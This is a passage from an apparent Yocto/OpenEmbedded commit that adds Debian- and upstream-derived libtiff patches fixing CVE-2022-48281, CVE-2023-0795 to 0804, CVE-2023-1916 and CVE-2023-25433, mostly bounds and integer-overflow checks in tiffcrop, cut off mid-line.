420+ /* Check if offset of an IFD has been changed and update offset of that IFD number. */
421+ if (dirn < tif->tif_dirnumber && tif->tif_dirlistdirn && tif->tif_dirlistoff) {
422+ /* tif_dirlistdirn can have IFD numbers dirn in random order */
423+ for (n = 0; n < tif->tif_dirnumber; n++) {
424+ if (tif->tif_dirlistdirn[n] == dirn) {
425+ tif->tif_dirlistoff[n] = diroff;
426+ return 1;
427+ }
428+ }
429 }
430
431+ /* Add IFD offset and dirn to IFD directory list */
432 tif->tif_dirnumber++;
433
434- if (tif->tif_dirlist == NULL || tif->tif_dirnumber > tif->tif_dirlistsize) {
435- uint64* new_dirlist;
436-
437+ if (tif->tif_dirlistoff == NULL || tif->tif_dirlistdirn == NULL || tif->tif_dirnumber > tif->tif_dirlistsize) {
438+ uint64 *new_dirlist;
439 /*
440 * XXX: Reduce memory allocation granularity of the dirlist
441 * array.
442 */
443- new_dirlist = (uint64*)_TIFFCheckRealloc(tif, tif->tif_dirlist,
444- tif->tif_dirnumber, 2 * sizeof(uint64), "for IFD list");
445+ if (tif->tif_dirnumber >= 32768)
446+ tif->tif_dirlistsize = 65535;
447+ else
448+ tif->tif_dirlistsize = 2 * tif->tif_dirnumber;
449+
450+ new_dirlist = (uint64 *)_TIFFCheckRealloc(tif, tif->tif_dirlistoff,
451+ tif->tif_dirlistsize, sizeof(uint64), "for IFD offset list");
452 if (!new_dirlist)
453 return 0;
454- if( tif->tif_dirnumber >= 32768 )
455- tif->tif_dirlistsize = 65535;
456- else
457- tif->tif_dirlistsize = 2 * tif->tif_dirnumber;
458- tif->tif_dirlist = new_dirlist;
459+ tif->tif_dirlistoff = new_dirlist;
460+ new_dirlist = (uint64 *)_TIFFCheckRealloc(tif, tif->tif_dirlistdirn,
461+ tif->tif_dirlistsize, sizeof(uint16), "for IFD dirnumber list");
462+ if (!new_dirlist)
463+ return 0;
464+ tif->tif_dirlistdirn = (uint16 *)new_dirlist;
465 }
466
467- tif->tif_dirlist[tif->tif_dirnumber - 1] = diroff;
468+ tif->tif_dirlistoff[tif->tif_dirnumber - 1] = diroff;
469+ tif->tif_dirlistdirn[tif->tif_dirnumber - 1] = dirn;
470
471 return 1;
472-}
473+} /* --- _TIFFCheckDirNumberAndOffset() ---*/
474
475 /*
476 * Check the count field of a directory entry against a known value. The
477@@ -4703,6 +4747,47 @@ CheckDirCount(TIFF* tif, TIFFDirEntry* d
478 }
479
480 /*
481+ * Retrieve the matching IFD directory number of a given IFD offset
482+ * from the list of directories already seen.
483+ * Returns 1 if the offset was in the list and the directory number
484+ * can be returned.
485+ * Otherwise returns 0 or if an error occured.
486+ */
487+int
488+_TIFFGetDirNumberFromOffset(TIFF *tif, uint64 diroff, uint16* dirn)
489+{
490+ uint16 n;
491+
492+ if (diroff == 0) /* no more directories */
493+ return 0;
494+ if (tif->tif_dirnumber == 65535) {
495+ TIFFErrorExt(tif->tif_clientdata, "_TIFFGetDirNumberFromOffset",
496+ "Cannot handle more than 65535 TIFF directories");
497+ return 0;
498+ }
499+
500+ /* Check if offset is already in the list and return matching directory number.
501+ * Otherwise update IFD list using TIFFNumberOfDirectories()
502+ * and search again in IFD list.
503+ */
504+ for (n = 0; n < tif->tif_dirnumber && tif->tif_dirlistoff && tif->tif_dirlistdirn; n++) {
505+ if (tif->tif_dirlistoff[n] == diroff) {
506+ *dirn = tif->tif_dirlistdirn[n];
507+ return 1;
508+ }
509+ }
510+ TIFFNumberOfDirectories(tif);
511+ for (n = 0; n < tif->tif_dirnumber && tif->tif_dirlistoff && tif->tif_dirlistdirn; n++) {
512+ if (tif->tif_dirlistoff[n] == diroff) {
513+ *dirn = tif->tif_dirlistdirn[n];
514+ return 1;
515+ }
516+ }
517+ return 0;
518+} /*--- _TIFFGetDirNumberFromOffset() ---*/
519+
520+
521+/*
522 * Read IFD structure from the specified offset. If the pointer to
523 * nextdiroff variable has been specified, read it too. Function returns a
524 * number of fields in the directory or 0 if failed.
525--- tiff-4.1.0+git191117.orig/libtiff/tif_open.c
526+++ tiff-4.1.0+git191117/libtiff/tif_open.c
527@@ -353,7 +353,8 @@ TIFFClientOpen(
528 if (!TIFFDefaultDirectory(tif))
529 goto bad;
530 tif->tif_diroff = 0;
531- tif->tif_dirlist = NULL;
532+ tif->tif_dirlistoff = NULL;
533+ tif->tif_dirlistdirn = NULL;
534 tif->tif_dirlistsize = 0;
535 tif->tif_dirnumber = 0;
536 return (tif);
537--- tiff-4.1.0+git191117.orig/libtiff/tiffiop.h
538+++ tiff-4.1.0+git191117/libtiff/tiffiop.h
539@@ -145,7 +145,8 @@ struct tiff {
540 #define TIFF_CHOPPEDUPARRAYS 0x4000000U /* set when allocChoppedUpStripArrays() has modified strip array */
541 uint64 tif_diroff; /* file offset of current directory */
542 uint64 tif_nextdiroff; /* file offset of following directory */
543- uint64* tif_dirlist; /* list of offsets to already seen directories to prevent IFD looping */
544+ uint64* tif_dirlistoff; /* list of offsets to already seen directories to prevent IFD looping */
545+ uint16* tif_dirlistdirn; /* list of directory numbers to already seen directories to prevent IFD looping */
546 uint16 tif_dirlistsize; /* number of entries in offset list */
547 uint16 tif_dirnumber; /* number of already seen directories */
548 TIFFDirectory tif_dir; /* internal rep of current directory */
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-48281.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-48281.patch
new file mode 100644
index 0000000000..5747202bd9
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-48281.patch
@@ -0,0 +1,26 @@
1From 424c82b5b33256e7f03faace51dc8010f3ded9ff Mon Sep 17 00:00:00 2001
2From: Su Laus <sulau@freenet.de>
3Date: Sat, 21 Jan 2023 15:58:10 +0000
4Subject: [PATCH] tiffcrop: Correct simple copy paste error. Fix #488.
5
6Upstream-Status: Backport [import from debian http://security.debian.org/debian-security/pool/updates/main/t/tiff/tiff_4.1.0+git191117-2~deb10u7.debian.tar.xz]
7CVE: CVE-2022-48281
8Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
9
10---
11 tools/tiffcrop.c | 2 +-
12 1 file changed, 1 insertion(+), 1 deletion(-)
13
14diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
15index a0789a3..8aed9cd 100644
16--- a/tools/tiffcrop.c
17+++ b/tools/tiffcrop.c
18@@ -7564,7 +7564,7 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
19 crop_buff = (unsigned char *)_TIFFmalloc(cropsize + NUM_BUFF_OVERSIZE_BYTES);
20 else
21 {
22- prev_cropsize = seg_buffs[0].size;
23+ prev_cropsize = seg_buffs[i].size;
24 if (prev_cropsize < cropsize)
25 {
26 next_buff = _TIFFrealloc(crop_buff, cropsize + NUM_BUFF_OVERSIZE_BYTES);
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-0795_0796_0797_0798_0799.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-0795_0796_0797_0798_0799.patch
new file mode 100644
index 0000000000..253018525a
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-0795_0796_0797_0798_0799.patch
@@ -0,0 +1,157 @@
1From 7808740e100ba30ffb791044f3b14dec3e85ed6f Mon Sep 17 00:00:00 2001
2From: Markus Koschany <apo@debian.org>
3Date: Tue, 21 Feb 2023 14:26:43 +0100
4Subject: [PATCH] CVE-2023-0795
5
6This is also the fix for CVE-2023-0796, CVE-2023-0797, CVE-2023-0798,
7CVE-2023-0799.
8
9Bug-Debian: https://bugs.debian.org/1031632
10Origin: https://gitlab.com/libtiff/libtiff/-/commit/afaabc3e50d4e5d80a94143f7e3c997e7e410f68
11
12Upstream-Status: Backport [import from debian http://security.debian.org/debian-security/pool/updates/main/t/tiff/tiff_4.1.0+git191117-2~deb10u7.debian.tar.xz ]
13CVE: CVE-2023-0795 CVE-2023-0796 CVE-2023-0797 CVE-2023-0798 CVE-2023-0799
14Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
15---
16 tools/tiffcrop.c | 51 ++++++++++++++++++++++++++++--------------------
17 1 file changed, 30 insertions(+), 21 deletions(-)
18
19diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
20index 8aed9cd..f21a7d7 100644
21--- a/tools/tiffcrop.c
22+++ b/tools/tiffcrop.c
23@@ -277,7 +277,6 @@ struct region {
24 uint32 width; /* width in pixels */
25 uint32 length; /* length in pixels */
26 uint32 buffsize; /* size of buffer needed to hold the cropped region */
27- unsigned char *buffptr; /* address of start of the region */
28 };
29
30 /* Cropping parameters from command line and image data
31@@ -532,7 +531,7 @@ static int rotateContigSamples24bits(uint16, uint16, uint16, uint32,
32 static int rotateContigSamples32bits(uint16, uint16, uint16, uint32,
33 uint32, uint32, uint8 *, uint8 *);
34 static int rotateImage(uint16, struct image_data *, uint32 *, uint32 *,
35- unsigned char **);
36+ unsigned char **, int);
37 static int mirrorImage(uint16, uint16, uint16, uint32, uint32,
38 unsigned char *);
39 static int invertImage(uint16, uint16, uint16, uint32, uint32,
40@@ -5112,7 +5111,6 @@ initCropMasks (struct crop_mask *cps)
41 cps->regionlist[i].width = 0;
42 cps->regionlist[i].length = 0;
43 cps->regionlist[i].buffsize = 0;
44- cps->regionlist[i].buffptr = NULL;
45 cps->zonelist[i].position = 0;
46 cps->zonelist[i].total = 0;
47 }
48@@ -6358,8 +6356,13 @@ static int correct_orientation(struct image_data *image, unsigned char **work_b
49 image->adjustments & ROTATE_ANY);
50 return (-1);
51 }
52-
53- if (rotateImage(rotation, image, &image->width, &image->length, work_buff_ptr))
54+
55+ /* Dummy variable in order not to switch two times the
56+ * image->width,->length within rotateImage(),
57+ * but switch xres, yres there. */
58+ uint32_t width = image->width;
59+ uint32_t length = image->length;
60+ if (rotateImage(rotation, image, &width, &length, work_buff_ptr, TRUE))
61 {
62 TIFFError ("correct_orientation", "Unable to rotate image");
63 return (-1);
64@@ -6427,7 +6430,6 @@ extractCompositeRegions(struct image_data *image, struct crop_mask *crop,
65 /* These should not be needed for composite images */
66 crop->regionlist[i].width = crop_width;
67 crop->regionlist[i].length = crop_length;
68- crop->regionlist[i].buffptr = crop_buff;
69
70 src_rowsize = ((img_width * bps * spp) + 7) / 8;
71 dst_rowsize = (((crop_width * bps * count) + 7) / 8);
72@@ -6664,7 +6666,6 @@ extractSeparateRegion(struct image_data *image, struct crop_mask *crop,
73
74 crop->regionlist[region].width = crop_width;
75 crop->regionlist[region].length = crop_length;
76- crop->regionlist[region].buffptr = crop_buff;
77
78 src = read_buff;
79 dst = crop_buff;
80@@ -7542,7 +7543,7 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
81 if (crop->crop_mode & CROP_ROTATE) /* rotate should be last as it can reallocate the buffer */
82 {
83 if (rotateImage(crop->rotation, image, &crop->combined_width,
84- &crop->combined_length, &crop_buff))
85+ &crop->combined_length, &crop_buff, FALSE))
86 {
87 TIFFError("processCropSelections",
88 "Failed to rotate composite regions by %d degrees", crop->rotation);
89@@ -7648,7 +7649,7 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
90 if (crop->crop_mode & CROP_ROTATE) /* rotate should be last as it can reallocate the buffer */
91 {
92 if (rotateImage(crop->rotation, image, &crop->regionlist[i].width,
93- &crop->regionlist[i].length, &crop_buff))
94+ &crop->regionlist[i].length, &crop_buff, FALSE))
95 {
96 TIFFError("processCropSelections",
97 "Failed to rotate crop region by %d degrees", crop->rotation);
98@@ -7780,7 +7781,7 @@ createCroppedImage(struct image_data *image, struct crop_mask *crop,
99 if (crop->crop_mode & CROP_ROTATE) /* rotate should be last as it can reallocate the buffer */
100 {
101 if (rotateImage(crop->rotation, image, &crop->combined_width,
102- &crop->combined_length, crop_buff_ptr))
103+ &crop->combined_length, crop_buff_ptr, TRUE))
104 {
105 TIFFError("createCroppedImage",
106 "Failed to rotate image or cropped selection by %d degrees", crop->rotation);
107@@ -8443,7 +8444,7 @@ rotateContigSamples32bits(uint16 rotation, uint16 spp, uint16 bps, uint32 width,
108 /* Rotate an image by a multiple of 90 degrees clockwise */
109 static int
110 rotateImage(uint16 rotation, struct image_data *image, uint32 *img_width,
111- uint32 *img_length, unsigned char **ibuff_ptr)
112+ uint32 *img_length, unsigned char **ibuff_ptr, int rot_image_params)
113 {
114 int shift_width;
115 uint32 bytes_per_pixel, bytes_per_sample;
116@@ -8634,11 +8635,15 @@ rotateImage(uint16 rotation, struct image_data *image, uint32 *img_width,
117
118 *img_width = length;
119 *img_length = width;
120- image->width = length;
121- image->length = width;
122- res_temp = image->xres;
123- image->xres = image->yres;
124- image->yres = res_temp;
125+ /* Only toggle image parameters if whole input image is rotated. */
126+ if (rot_image_params)
127+ {
128+ image->width = length;
129+ image->length = width;
130+ res_temp = image->xres;
131+ image->xres = image->yres;
132+ image->yres = res_temp;
133+ }
134 break;
135
136 case 270: if ((bps % 8) == 0) /* byte aligned data */
137@@ -8711,11 +8716,15 @@ rotateImage(uint16 rotation, struct image_data *image, uint32 *img_width,
138
139 *img_width = length;
140 *img_length = width;
141- image->width = length;
142- image->length = width;
143- res_temp = image->xres;
144- image->xres = image->yres;
145- image->yres = res_temp;
146+ /* Only toggle image parameters if whole input image is rotated. */
147+ if (rot_image_params)
148+ {
149+ image->width = length;
150+ image->length = width;
151+ res_temp = image->xres;
152+ image->xres = image->yres;
153+ image->yres = res_temp;
154+ }
155 break;
156 default:
157 break;
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-0800_0801_0802_0803_0804.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-0800_0801_0802_0803_0804.patch
new file mode 100644
index 0000000000..bf1a439b4d
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-0800_0801_0802_0803_0804.patch
@@ -0,0 +1,135 @@
1From e18be834497e0ebf68d443abb9e18187f36cd3bf Mon Sep 17 00:00:00 2001
2From: Markus Koschany <apo@debian.org>
3Date: Tue, 21 Feb 2023 14:39:52 +0100
4Subject: [PATCH] CVE-2023-0800
5
6This is also the fix for CVE-2023-0801, CVE-2023-0802, CVE-2023-0803,
7CVE-2023-0804.
8
9Bug-Debian: https://bugs.debian.org/1031632
10Origin: https://gitlab.com/libtiff/libtiff/-/commit/33aee1275d9d1384791d2206776eb8152d397f00
11
12Upstream-Status: Backport [import from debian http://security.debian.org/debian-security/pool/updates/main/t/tiff/tiff_4.1.0+git191117-2~deb10u7.debian.tar.xz ]
13CVE: CVE-2023-0800 CVE-2023-0801 CVE-2023-0802 CVE-2023-0803 CVE-2023-0804
14Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
15---
16 tools/tiffcrop.c | 73 +++++++++++++++++++++++++++++++++++++++++++++---
17 1 file changed, 69 insertions(+), 4 deletions(-)
18
19diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
20index f21a7d7..742615a 100644
21--- a/tools/tiffcrop.c
22+++ b/tools/tiffcrop.c
23@@ -5250,18 +5250,40 @@ computeInputPixelOffsets(struct crop_mask *crop, struct image_data *image,
24
25 crop->regionlist[i].buffsize = buffsize;
26 crop->bufftotal += buffsize;
27+
28+ /* For composite images with more than one region, the
29+ * combined_length or combined_width always needs to be equal,
30+ * respectively.
31+ * Otherwise, even the first section/region copy
32+ * action might cause buffer overrun. */
33 if (crop->img_mode == COMPOSITE_IMAGES)
34 {
35 switch (crop->edge_ref)
36 {
37 case EDGE_LEFT:
38 case EDGE_RIGHT:
39+ if (i > 0 && zlength != crop->combined_length)
40+ {
41+ TIFFError(
42+ "computeInputPixelOffsets",
43+ "Only equal length regions can be combined for "
44+ "-E left or right");
45+ return (-1);
46+ }
47 crop->combined_length = zlength;
48 crop->combined_width += zwidth;
49 break;
50 case EDGE_BOTTOM:
51 case EDGE_TOP: /* width from left, length from top */
52 default:
53+ if (i > 0 && zwidth != crop->combined_width)
54+ {
55+ TIFFError("computeInputPixelOffsets",
56+ "Only equal width regions can be "
57+ "combined for -E "
58+ "top or bottom");
59+ return (-1);
60+ }
61 crop->combined_width = zwidth;
62 crop->combined_length += zlength;
63 break;
64@@ -6416,6 +6438,47 @@ extractCompositeRegions(struct image_data *image, struct crop_mask *crop,
65 crop->combined_width = 0;
66 crop->combined_length = 0;
67
68+ /* If there is more than one region, check beforehand whether all the width
69+ * and length values of the regions are the same, respectively. */
70+ switch (crop->edge_ref)
71+ {
72+ default:
73+ case EDGE_TOP:
74+ case EDGE_BOTTOM:
75+ for (i = 1; i < crop->selections; i++)
76+ {
77+ uint32_t crop_width0 =
78+ crop->regionlist[i - 1].x2 - crop->regionlist[i - 1].x1 + 1;
79+ uint32_t crop_width1 =
80+ crop->regionlist[i].x2 - crop->regionlist[i].x1 + 1;
81+ if (crop_width0 != crop_width1)
82+ {
83+ TIFFError("extractCompositeRegions",
84+ "Only equal width regions can be combined for -E "
85+ "top or bottom");
86+ return (1);
87+ }
88+ }
89+ break;
90+ case EDGE_LEFT:
91+ case EDGE_RIGHT:
92+ for (i = 1; i < crop->selections; i++)
93+ {
94+ uint32_t crop_length0 =
95+ crop->regionlist[i - 1].y2 - crop->regionlist[i - 1].y1 + 1;
96+ uint32_t crop_length1 =
97+ crop->regionlist[i].y2 - crop->regionlist[i].y1 + 1;
98+ if (crop_length0 != crop_length1)
99+ {
100+ TIFFError("extractCompositeRegions",
101+ "Only equal length regions can be combined for "
102+ "-E left or right");
103+ return (1);
104+ }
105+ }
106+ }
107+
108+
109 for (i = 0; i < crop->selections; i++)
110 {
111 /* rows, columns, width, length are expressed in pixels */
112@@ -6439,8 +6502,9 @@ extractCompositeRegions(struct image_data *image, struct crop_mask *crop,
113 default:
114 case EDGE_TOP:
115 case EDGE_BOTTOM:
116- if ((i > 0) && (crop_width != crop->regionlist[i - 1].width))
117- {
118+ if ((crop->selections > i + 1) &&
119+ (crop_width != crop->regionlist[i + 1].width))
120+ {
121 TIFFError ("extractCompositeRegions",
122 "Only equal width regions can be combined for -E top or bottom");
123 return (1);
124@@ -6520,8 +6584,9 @@ extractCompositeRegions(struct image_data *image, struct crop_mask *crop,
125 break;
126 case EDGE_LEFT: /* splice the pieces of each row together, side by side */
127 case EDGE_RIGHT:
128- if ((i > 0) && (crop_length != crop->regionlist[i - 1].length))
129- {
130+ if ((crop->selections > i + 1) &&
131+ (crop_length != crop->regionlist[i + 1].length))
132+ {
133 TIFFError ("extractCompositeRegions",
134 "Only equal length regions can be combined for -E left or right");
135 return (1);
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-1916.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-1916.patch
new file mode 100644
index 0000000000..9915b77645
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-1916.patch
@@ -0,0 +1,91 @@
1From 848434a81c443f59ec90d41218eba6e48a450a11 Mon Sep 17 00:00:00 2001
2From: zhailiangliang <zhailiangliang@loongson.cn>
3Date: Thu, 16 Mar 2023 16:16:54 +0800
4Subject: [PATCH] Fix heap-buffer-overflow in function extractImageSection
5
6CVE: CVE-2023-1916
7Upstream-Status: Submitted [https://gitlab.com/libtiff/libtiff/-/commit/848434a81c443f59ec90d41218eba6e48a450a11 https://gitlab.com/libtiff/libtiff/-/merge_requests/535]
8Signed-off-by: Marek Vasut <marex@denx.de>
9---
10 archive/tools/tiffcrop.c | 62 +++++++++++++++++++++++++++++-----------
11 1 file changed, 45 insertions(+), 17 deletions(-)
12
13--- tiff-4.1.0+git191117.orig/tools/tiffcrop.c
14+++ tiff-4.1.0+git191117/tools/tiffcrop.c
15@@ -5549,6 +5549,15 @@ getCropOffsets(struct image_data *image,
16 crop->combined_width += (uint32)zwidth;
17 else
18 crop->combined_width = (uint32)zwidth;
19+
20+ /* When the degrees clockwise rotation is 90 or 270, check the boundary */
21+ if (((crop->rotation == 90) || (crop->rotation == 270))
22+ && ((crop->combined_length > image->width) || (crop->combined_width > image->length)))
23+ {
24+ TIFFError("getCropOffsets", "The crop size exceeds the image boundary size");
25+ return -1;
26+ }
27+
28 break;
29 case EDGE_BOTTOM: /* width from left, zones from bottom to top */
30 zwidth = offsets.crop_width;
31@@ -5579,6 +5588,15 @@ getCropOffsets(struct image_data *image,
32 else
33 crop->combined_length = (uint32)zlength;
34 crop->combined_width = (uint32)zwidth;
35+
36+ /* When the degrees clockwise rotation is 90 or 270, check the boundary */
37+ if (((crop->rotation == 90) || (crop->rotation == 270))
38+ && ((crop->combined_length > image->width) || (crop->combined_width > image->length)))
39+ {
40+ TIFFError("getCropOffsets", "The crop size exceeds the image boundary size");
41+ return -1;
42+ }
43+
44 break;
45 case EDGE_RIGHT: /* zones from right to left, length from top */
46 zlength = offsets.crop_length;
47@@ -5606,6 +5624,15 @@ getCropOffsets(struct image_data *image,
48 crop->combined_width += (uint32)zwidth;
49 else
50 crop->combined_width = (uint32)zwidth;
51+
52+ /* When the degrees clockwise rotation is 90 or 270, check the boundary */
53+ if (((crop->rotation == 90) || (crop->rotation == 270))
54+ && ((crop->combined_length > image->width) || (crop->combined_width > image->length)))
55+ {
56+ TIFFError("getCropOffsets", "The crop size exceeds the image boundary size");
57+ return -1;
58+ }
59+
60 break;
61 case EDGE_TOP: /* width from left, zones from top to bottom */
62 default:
63@@ -5632,6 +5659,15 @@ getCropOffsets(struct image_data *image,
64 else
65 crop->combined_length = (uint32)zlength;
66 crop->combined_width = (uint32)zwidth;
67+
68+ /* When the degrees clockwise rotation is 90 or 270, check the boundary */
69+ if (((crop->rotation == 90) || (crop->rotation == 270))
70+ && ((crop->combined_length > image->width) || (crop->combined_width > image->length)))
71+ {
72+ TIFFError("getCropOffsets", "The crop size exceeds the image boundary size");
73+ return -1;
74+ }
75+
76 break;
77 } /* end switch statement */
78
79@@ -6827,9 +6863,9 @@ extractImageSection(struct image_data *i
80 * regardless of the way the data are organized in the input file.
81 * Furthermore, bytes and bits are arranged in buffer according to COMPRESSION=1 and FILLORDER=1
82 */
83- img_rowsize = (((img_width * spp * bps) + 7) / 8); /* row size in full bytes of source image */
84- full_bytes = (sect_width * spp * bps) / 8; /* number of COMPLETE bytes per row in section */
85- trailing_bits = (sect_width * spp * bps) % 8; /* trailing bits within the last byte of destination buffer */
86+ img_rowsize = (((img_width * spp * bps) + 7) / 8); /* row size in full bytes of source image */
87+ full_bytes = (sect_width * spp * bps) / 8; /* number of COMPLETE bytes per row in section */
88+ trailing_bits = (sect_width * spp * bps) % 8; /* trailing bits within the last byte of destination buffer */
89
90 #ifdef DEVELMODE
91 TIFFError ("", "First row: %d, last row: %d, First col: %d, last col: %d\n",
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-25433.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-25433.patch
new file mode 100644
index 0000000000..7d6d40f25a
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-25433.patch
@@ -0,0 +1,173 @@
1From 9c22495e5eeeae9e00a1596720c969656bb8d678 Mon Sep 17 00:00:00 2001
2From: Su_Laus <sulau@freenet.de>
3Date: Fri, 3 Feb 2023 15:31:31 +0100
4Subject: [PATCH] tiffcrop correctly update buffersize after rotateImage()
5 fix#520 rotateImage() set up a new buffer and calculates its size
6 individually. Therefore, seg_buffs[] size needs to be updated accordingly.
7 Before this fix, the seg_buffs buffer size was calculated with a different
8 formula than within rotateImage().
9
10Closes #520.
11
12Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/9c22495e5eeeae9e00a1596720c969656bb8d678 && https://gitlab.com/libtiff/libtiff/-/commit/688012dca2c39033aa2dc7bcea9796787cfd1b44]
13CVE: CVE-2023-25433
14Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
15---
16 tools/tiffcrop.c | 69 +++++++++++++++++++++++++++++++++++++++---------
17 1 file changed, 56 insertions(+), 13 deletions(-)
18
19diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
20index 742615a..aab0ec6 100644
21--- a/tools/tiffcrop.c
22+++ b/tools/tiffcrop.c
23@@ -531,7 +531,7 @@ static int rotateContigSamples24bits(uint16, uint16, uint16, uint32,
24 static int rotateContigSamples32bits(uint16, uint16, uint16, uint32,
25 uint32, uint32, uint8 *, uint8 *);
26 static int rotateImage(uint16, struct image_data *, uint32 *, uint32 *,
27- unsigned char **, int);
28+ unsigned char **, size_t *);
29 static int mirrorImage(uint16, uint16, uint16, uint32, uint32,
30 unsigned char *);
31 static int invertImage(uint16, uint16, uint16, uint32, uint32,
32@@ -6384,7 +6384,7 @@ static int correct_orientation(struct image_data *image, unsigned char **work_b
33 * but switch xres, yres there. */
34 uint32_t width = image->width;
35 uint32_t length = image->length;
36- if (rotateImage(rotation, image, &width, &length, work_buff_ptr, TRUE))
37+ if (rotateImage(rotation, image, &width, &length, work_buff_ptr, NULL))
38 {
39 TIFFError ("correct_orientation", "Unable to rotate image");
40 return (-1);
41@@ -7607,8 +7607,12 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
42
43 if (crop->crop_mode & CROP_ROTATE) /* rotate should be last as it can reallocate the buffer */
44 {
45+ /* rotateImage() set up a new buffer and calculates its size
46+ * individually. Therefore, seg_buffs size needs to be updated
47+ * accordingly. */
48+ size_t rot_buf_size = 0;
49 if (rotateImage(crop->rotation, image, &crop->combined_width,
50- &crop->combined_length, &crop_buff, FALSE))
51+ &crop->combined_length, &crop_buff, &rot_buf_size))
52 {
53 TIFFError("processCropSelections",
54 "Failed to rotate composite regions by %d degrees", crop->rotation);
55@@ -7713,8 +7717,13 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
56
57 if (crop->crop_mode & CROP_ROTATE) /* rotate should be last as it can reallocate the buffer */
58 {
59- if (rotateImage(crop->rotation, image, &crop->regionlist[i].width,
60- &crop->regionlist[i].length, &crop_buff, FALSE))
61+ /* Furthermore, rotateImage() set up a new buffer and calculates
62+ * its size individually. Therefore, seg_buffs size needs to be
63+ * updated accordingly. */
64+ size_t rot_buf_size = 0;
65+ if (rotateImage(
66+ crop->rotation, image, &crop->regionlist[i].width,
67+ &crop->regionlist[i].length, &crop_buff, &rot_buf_size))
68 {
69 TIFFError("processCropSelections",
70 "Failed to rotate crop region by %d degrees", crop->rotation);
71@@ -7725,8 +7734,7 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
72 crop->combined_width = total_width;
73 crop->combined_length = total_length;
74 seg_buffs[i].buffer = crop_buff;
75- seg_buffs[i].size = (((crop->regionlist[i].width * image->bps + 7 ) / 8)
76- * image->spp) * crop->regionlist[i].length;
77+ seg_buffs[i].size = rot_buf_size;
78 }
79 }
80 }
81@@ -7735,7 +7743,6 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
82
83 /* Copy the crop section of the data from the current image into a buffer
84 * and adjust the IFD values to reflect the new size. If no cropping is
85- * required, use the origial read buffer as the crop buffer.
86 *
87 * There is quite a bit of redundancy between this routine and the more
88 * specialized processCropSelections, but this provides
89@@ -7846,7 +7853,7 @@ createCroppedImage(struct image_data *image, struct crop_mask *crop,
90 if (crop->crop_mode & CROP_ROTATE) /* rotate should be last as it can reallocate the buffer */
91 {
92 if (rotateImage(crop->rotation, image, &crop->combined_width,
93- &crop->combined_length, crop_buff_ptr, TRUE))
94+ &crop->combined_length, crop_buff_ptr, NULL))
95 {
96 TIFFError("createCroppedImage",
97 "Failed to rotate image or cropped selection by %d degrees", crop->rotation);
98@@ -8515,7 +8522,8 @@ rotateImage(uint16 rotation, struct image_data *image, uint32 *img_width,
99 uint32 bytes_per_pixel, bytes_per_sample;
100 uint32 row, rowsize, src_offset, dst_offset;
101 uint32 i, col, width, length;
102- uint32 colsize, buffsize, col_offset, pix_offset;
103+ uint32 colsize, col_offset, pix_offset;
104+ tmsize_t buffsize;
105 unsigned char *ibuff;
106 unsigned char *src;
107 unsigned char *dst;
108@@ -8528,12 +8536,41 @@ rotateImage(uint16 rotation, struct image_data *image, uint32 *img_width,
109 spp = image->spp;
110 bps = image->bps;
111
112+ if ((spp != 0 && bps != 0 &&
113+ width > (uint32_t)((UINT32_MAX - 7) / spp / bps)) ||
114+ (spp != 0 && bps != 0 &&
115+ length > (uint32_t)((UINT32_MAX - 7) / spp / bps)))
116+ {
117+ TIFFError("rotateImage", "Integer overflow detected.");
118+ return (-1);
119+ }
120+
121 rowsize = ((bps * spp * width) + 7) / 8;
122 colsize = ((bps * spp * length) + 7) / 8;
123 if ((colsize * width) > (rowsize * length))
124- buffsize = (colsize + 1) * width;
125+{
126+ if (((tmsize_t)colsize + 1) != 0 &&
127+ (tmsize_t)width > ((TIFF_TMSIZE_T_MAX - NUM_BUFF_OVERSIZE_BYTES) /
128+ ((tmsize_t)colsize + 1)))
129+ {
130+ TIFFError("rotateImage",
131+ "Integer overflow when calculating buffer size.");
132+ return (-1);
133+ }
134+ buffsize = ((tmsize_t)colsize + 1) * width;
135+ }
136 else
137- buffsize = (rowsize + 1) * length;
138+ {
139+ if (((tmsize_t)rowsize + 1) != 0 &&
140+ (tmsize_t)length > ((TIFF_TMSIZE_T_MAX - NUM_BUFF_OVERSIZE_BYTES) /
141+ ((tmsize_t)rowsize + 1)))
142+ {
143+ TIFFError("rotateImage",
144+ "Integer overflow when calculating buffer size.");
145+ return (-1);
146+ }
147+ buffsize = (rowsize + 1) * length;
148+ }
149
150 bytes_per_sample = (bps + 7) / 8;
151 bytes_per_pixel = ((bps * spp) + 7) / 8;
152@@ -8556,11 +8593,17 @@ rotateImage(uint16 rotation, struct image_data *image, uint32 *img_width,
153 /* Add 3 padding bytes for extractContigSamplesShifted32bits */
154 if (!(rbuff = (unsigned char *)_TIFFmalloc(buffsize + NUM_BUFF_OVERSIZE_BYTES)))
155 {
156- TIFFError("rotateImage", "Unable to allocate rotation buffer of %1u bytes", buffsize + NUM_BUFF_OVERSIZE_BYTES);
